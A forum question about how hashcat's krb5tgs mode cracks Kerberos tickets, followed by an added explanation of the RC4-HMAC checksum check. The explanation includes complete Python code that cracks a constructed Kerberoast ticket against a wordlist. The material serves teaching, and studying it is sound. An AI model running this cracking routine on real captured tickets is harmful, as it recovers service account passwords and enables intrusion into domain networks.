How does krb5tgs actually work? (Mathematically)
Hey, I am learning about Kerberos.

I know that the krb5tgs module can try to crack the Kerberos AS-REP client-KDC session key encrypted with the user's NT hash, and it can try to crack the Kerberos TGS-REP service ticket encrypted with the service account's NT hash.

What I am curious about is what logic is used to crack these values.
If, in the AS-REP, the generated client-KDC session key is unknown and it is encrypted with the user's NT hash, which is also unknown, then how is it crackable? What kind of comparison is made?

Hey, in case someone knows, I am still looking for that answer. Thanks.
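Added worked example (not part of the original post, and not hashcat's own code) showing the comparison the question asks about. The short answer: nobody compares the unknown session key. With etype 23 (RC4-HMAC, RFC 4757) the encrypted part of a ticket or AS-REP is `checksum || RC4(K3, confounder || plaintext)`, where `K1 = HMAC-MD5(NThash, key_usage)`, `checksum = HMAC-MD5(K1, confounder || plaintext)` and `K3 = HMAC-MD5(K1, checksum)`. The 16-byte checksum travels in the clear, so a cracker takes a candidate password, computes its NT hash (MD4 of the UTF-16-LE password), derives K1 and K3, decrypts, recomputes the HMAC over the decrypted bytes and compares it with the checksum it was given; a wrong key passes that 128-bit check with negligible probability. The same check works for the AS-REP enc-part (key usage 8, the user's key) and for the TGS-REP service ticket (key usage 2, the service account's key), which is what hashcat's `$krb5tgs$23$...` (mode 13100) and `$krb5asrep$23$...` (mode 18200) lines carry. For AES etypes 17/18 the key derivation changes to PBKDF2 plus AES-CTS, but the principle, verify a keyed checksum rather than the secret inside, is identical. The account names, SPN, realm, ticket body, confounder and wordlist below are all constructed for the example; MD4 is implemented inline because OpenSSL 3 builds of Python often lack it.

```python
"""RC4-HMAC (etype 23) encryption as Kerberos does it, and the cracker's check.

Added example for this thread; all sample values are constructed.
"""
import hashlib
import hmac
import struct

MASK32 = 0xFFFFFFFF
KEY_USAGE_TGS_REP_TICKET = 2   # ticket enc-part, keyed with the service account's key
KEY_USAGE_AS_REP_ENC_PART = 8  # AS-REP enc-part, keyed with the user's key


def md4(data: bytes) -> bytes:
    """Minimal MD4 (RFC 1320); hashlib's md4 is frequently unavailable."""
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    rotl = lambda x, n: ((x << n) | (x >> (32 - n))) & MASK32
    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", len(data) * 8)
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    rounds = (
        (F, 0x00000000, range(16), (3, 7, 11, 19)),
        (G, 0x5A827999, (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13)),
        (H, 0x6ED9EBA1, (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15)),
    )
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = state
        for f, k, order, shifts in rounds:
            for j, xi in enumerate(order):
                a = rotl((a + f(b, c, d) + X[xi] + k) & MASK32, shifts[j % 4])
                a, b, c, d = d, a, b, c  # rotate registers: next step updates the old d
        state = [(s + v) & MASK32 for s, v in zip(state, (a, b, c, d))]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> bytes:
    """NT hash = MD4(UTF-16-LE(password)); this is the RC4-HMAC key itself."""
    return md4(password.encode("utf-16-le"))


def rc4(key: bytes, data: bytes) -> bytes:
    S = list(range(256))
    j = 0
    for i in range(256):                      # key scheduling
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:                         # keystream generation
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def hmac_md5(key: bytes, data: bytes) -> bytes:
    return hmac.new(key, data, hashlib.md5).digest()


def rc4_hmac_encrypt(key: bytes, usage: int, plaintext: bytes, confounder: bytes):
    """KDC side (RFC 4757): returns (checksum, edata) as carried in the EncryptedData."""
    k1 = hmac_md5(key, struct.pack("<I", usage))
    data = confounder + plaintext
    checksum = hmac_md5(k1, data)
    k3 = hmac_md5(k1, checksum)
    return checksum, rc4(k3, data)


def rc4_hmac_try_key(key: bytes, usage: int, checksum: bytes, edata: bytes) -> bool:
    """Cracker side: derive K1/K3 from a candidate key, decrypt, recompute the HMAC."""
    k1 = hmac_md5(key, struct.pack("<I", usage))
    k3 = hmac_md5(k1, checksum)
    data = rc4(k3, edata)
    return hmac.compare_digest(hmac_md5(k1, data), checksum)


def krb5tgs_line(user: str, realm: str, spn: str, checksum: bytes, edata: bytes) -> str:
    """hashcat mode 13100 format: $krb5tgs$23$*user$realm$spn*$checksum$edata."""
    return f"$krb5tgs$23$*{user}${realm}${spn}*${checksum.hex()}${edata.hex()}"


def parse_krb5tgs_line(line: str):
    if not line.startswith("$krb5tgs$23$"):
        raise ValueError("only etype 23 lines are handled here")
    _, checksum_hex, edata_hex = line.rsplit("$", 2)
    return bytes.fromhex(checksum_hex), bytes.fromhex(edata_hex)


def crack_krb5tgs(line: str, wordlist):
    """Return the first password whose NT hash verifies the ticket checksum, else None."""
    checksum, edata = parse_krb5tgs_line(line)
    for pw in wordlist:
        if rc4_hmac_try_key(nt_hash(pw), KEY_USAGE_TGS_REP_TICKET, checksum, edata):
            return pw
    return None


def demo():
    """Constructed Kerberoast round trip: issue a ticket, then recover the password."""
    service_password = "Summer2019!"                                 # constructed
    ticket_body = b"stand-in for the DER-encoded EncTicketPart (session key, PAC, times)"
    confounder = b"\x11\x22\x33\x44\x55\x66\x77\x88"                 # Kerberos uses 8 random bytes
    checksum, edata = rc4_hmac_encrypt(nt_hash(service_password), KEY_USAGE_TGS_REP_TICKET,
                                       ticket_body, confounder)
    line = krb5tgs_line("alice", "CORP.LOCAL", "MSSQLSvc/db01.corp.local:1433", checksum, edata)
    return line, crack_krb5tgs(line, ["password", "Welcome1", "Summer2019!", "Winter2020"])


if __name__ == "__main__":
    line, found = demo()
    print(line)
    print("recovered:", found)
```

Note that the key usage value is part of K1, so a TGS-REP ticket line will not verify under usage 8 even with the right password; that is why the cracker needs to know which message the blob came from, and why AS-REP and TGS-REP are separate hash modes.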